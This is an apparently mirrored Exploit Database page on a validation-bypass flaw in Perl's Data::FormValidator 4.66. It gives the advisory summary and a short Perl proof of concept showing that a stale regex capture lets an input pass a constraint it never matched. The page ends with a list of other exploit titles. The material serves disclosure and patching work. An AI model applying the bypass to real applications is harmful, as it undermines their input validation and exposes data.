Perl Data::FormValidator 4.66 Module – ‘results()’ Security Bypass

Exploit Database
20 阅读

作者： dst

日期： 2011-06-08
类别：
- remote
平台：
- linux
来源：https://www.exploit-db.com/exploits/35836/

source: https://www.securityfocus.com/bid/48167/info

The Perl Data::FormValidator module is prone to a security-bypass vulnerability.

An attacker can exploit this issue to bypass certain security restrictions and obtain potentially sensitive information.

Data::FormValidator 4.66 is vulnerable; other versions may also be affected.

#!/opt/perl/5.12/bin/perl

use strict;
use warnings;

use Data::FormValidator;

"some_unrelated_string" =~ m/^.*$/;

my $profile = {
untaint_all_constraints => 1,
required => [qw(a)],
constraint_methods => {
a => qr/will_never_match/,
},
};

my $results = Data::FormValidator->check({ a => 1 }, $profile);
warn $results->valid('a');

last Exploits
Perl Data::FormValidator 4.66 Module – ‘results()’ Security Bypass的更多信息

VNC Keyboard – Remote Code Execution (Metasploit)：
PCMan FTP Server 2.0.7 – ‘ls’ Remote Buffer Overflow (Metasploit)：
Microsoft Internet Explorer – Unsafe Scripting Misconfiguration (Metasploit)：
H3C SSL VPN – Username Enumeration：
Freefloat FTP Server 1.0 – ‘ACCL’ Remote Buffer Overflow：
Baldr Botnet Panel – Arbitrary Code Execution (Metasploit)：
MySQL yaSSL (Linux) – SSL Hello Message Buffer Overflow (Metasploit)：
SDT-CW3B1 1.1.0 – OS Command Injection：